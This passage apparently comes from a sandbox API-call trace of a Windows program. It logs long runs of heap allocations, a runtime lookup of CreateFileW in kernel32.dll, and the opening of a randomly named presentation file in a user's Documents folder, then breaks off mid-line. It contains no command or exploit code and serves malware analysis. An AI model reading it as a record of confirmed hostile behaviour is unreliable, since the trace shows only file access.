(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0079.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0079.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0079.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0079.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4fa8 [0079.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0079.927] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.929] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad90 [0079.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cad90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0079.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.930] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0079.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0079.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0079.931] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\JzioP.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\jziop.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431da28 [0079.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.933] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: 